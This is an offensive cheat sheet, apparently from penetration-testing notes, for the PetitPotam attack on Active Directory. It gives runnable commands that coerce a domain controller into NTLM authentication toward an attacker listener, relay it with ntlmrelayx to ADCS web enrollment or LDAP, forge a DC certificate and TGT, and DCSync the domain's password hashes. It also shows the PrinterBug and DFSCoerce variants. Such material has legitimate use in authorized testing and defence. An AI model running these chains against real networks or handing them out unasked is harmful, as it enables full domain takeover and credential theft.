Overview

PetitPotam abuses the MS-EFSRPC (Encrypting File System Remote Protocol) interface, exposed over named pipes such as \pipe\lsarpc and \pipe\efsrpc, to make a target (typically a domain controller) authenticate with its machine account to an attacker-controlled host over NTLM. That authentication is then relayed to the ADCS web enrollment endpoint (ESC8) to obtain a certificate for the DC's machine account, or to LDAP to configure resource-based constrained delegation (RBCD); either path ends in domain takeover. Because the coerced authentication is NTLM, the relay only works against services that do not enforce signing or channel binding, so check the target service's hardening before starting the chain.

Coerce Authentication

# https://github.com/topotam/PetitPotam
# Usage: PetitPotam.py [-u USER] [-p PASSWORD] [-d DOMAIN] [-hashes LM:NT] [-pipe PIPE] LISTENER TARGET
# LISTENER is the attacker host the target is coerced to authenticate to; TARGET is the coerced host (usually a DC)
python3 PetitPotam.py ATTACKER_IP DC_IP
python3 PetitPotam.py -u user -p password -d DOMAIN ATTACKER_IP DC_IP

Unauthenticated (Unpatched)

Works only against hosts missing Microsoft's August 2021 LSA spoofing fix (CVE-2021-36942); later updates closed the remaining unauthenticated EFSRPC methods, so expect this to fail against a patched DC.

python3 PetitPotam.py ATTACKER_IP DC_IP

Authenticated

Any valid domain account works, including a low-privileged user; this is the form to use against patched hosts.

python3 PetitPotam.py -u user -p password -d DOMAIN ATTACKER_IP DC_IP

Relay to ADCS (ESC8) — Full Domain Takeover

Prerequisites: the CA runs the web enrollment role (certsrv) over plain HTTP with NTLM accepted and no Extended Protection for Authentication, and the DomainController template is published (it is by default). The coerced authentication arrives on the attacker's SMB listener, so port 445 must be free on ATTACKER_IP.

Setup ntlmrelayx

# Relay to the CA web enrollment endpoint and request a certificate from the DomainController template
# (use --template Machine when the coerced host is a member server or workstation rather than a DC)
impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Trigger PetitPotam

python3 PetitPotam.py ATTACKER_IP DC_IP

Use Certificate

# ntlmrelayx prints the issued certificate as a base64 PKCS#12 blob; write it to a PFX file
echo 'BASE64_FROM_NTLMRELAYX' | base64 -d > dc.pfx

# Get a TGT for the DC's machine account with the certificate (PKINIT)
# https://github.com/dirkjanm/PKINITtools
python3 gettgtpkinit.py -cert-pfx dc.pfx DOMAIN/'DC$' dc.ccache

# DCSync with the DC's TGT; use the DC's FQDN so Kerberos resolves the right SPN
export KRB5CCNAME=dc.ccache
impacket-secretsdump -k -no-pass -just-dc DOMAIN/'DC$'@DC_HOSTNAME

Relay to LDAP (RBCD)

# --delegate-access creates a new computer account (or, with --escalate-user, uses the named existing account,
# which needs an SPN) and writes it into msDS-AllowedToActOnBehalfOfOtherIdentity of the relayed machine account
impacket-ntlmrelayx -t ldap://DC_IP -smb2support --delegate-access --escalate-user attacker
python3 PetitPotam.py ATTACKER_IP DC_IP

Caveat: the Windows SMB client sets the NTLM signing flag, so authentication coerced over SMB generally cannot be relayed to LDAP on a patched host. For the LDAP target, coerce a host that runs the WebClient service and give PetitPotam a WebDAV-style listener (for example ATTACKER_IP@80/x) so the authentication arrives over HTTP; domain controllers rarely run WebClient, so this path usually lands on member servers rather than the DC. Once delegation is set, request a service ticket to the coerced host as a privileged user with impacket-getST -impersonate using the account ntlmrelayx created.

Other Coercion Methods

Tool                      Protocol
PetitPotam                MS-EFSRPC
PrinterBug / SpoolSample  MS-RPRN
DFSCoerce                 MS-DFSNM
ShadowCoerce              MS-FSRVP

PrinterBug

# https://github.com/dirkjanm/krbrelayx
# Requires the Print Spooler service to be running on the target; always authenticated
python3 printerbug.py DOMAIN/user:password@DC_IP ATTACKER_IP

DFSCoerce

# https://github.com/Wh04m1001/DFSCoerce
# Targets the DFS Namespace service (MS-DFSNM), which domain controllers run by default; requires credentials
python3 dfscoerce.py -u user -p password -d DOMAIN ATTACKER_IP DC_IP

Quick Reference

Step        Command
Coerce      PetitPotam.py ATTACKER_IP DC_IP
Relay ADCS  ntlmrelayx -t http://CA/certsrv/... -smb2support --adcs --template DomainController
Relay LDAP  ntlmrelayx -t ldap://DC -smb2support --delegate-access
Get TGT     gettgtpkinit.py -cert-pfx dc.pfx DOMAIN/'DC$' dc.ccache